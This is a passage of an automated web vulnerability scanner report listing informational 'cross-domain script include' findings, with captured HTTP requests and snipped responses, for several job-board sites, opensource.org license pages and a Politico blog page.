Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.389. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:59 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 19:47:06 GMT
ETag: "137d5aff6fab07cd18eb3b969e04675a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.390. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 18:31:08 GMT
ETag: "f3ee3970abd9b05424adb4d6b0250644"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

15.391. http://www.operationscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.392. http://www.parttimecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.393. http://www.pharmaceuticalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.394. http://www.physicalsecuritycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.395. http://www.physicaltherapycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.396. http://www.planningcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.397. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html HTTP/1.1
Host: www.politico.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.6 (Fedora)
Node: Cluster Node 1
Last-Modified: Wed, 29 Dec 2010 21:27:36 GMT
ETag: "23584b9-10030-3ce38200"
Content-Type: text/html
Cache-Control: max-age=0
Expires: Fri, 21 Jan 2011 23:39:49 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   xmlns:og="http://ope
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7bhLrd63bC8jI&callback=qc_callback"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2473"></script>
...[SNIP]...
</ul>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.398. http://www.postdoctoralfellowcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.399. http://www.prcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

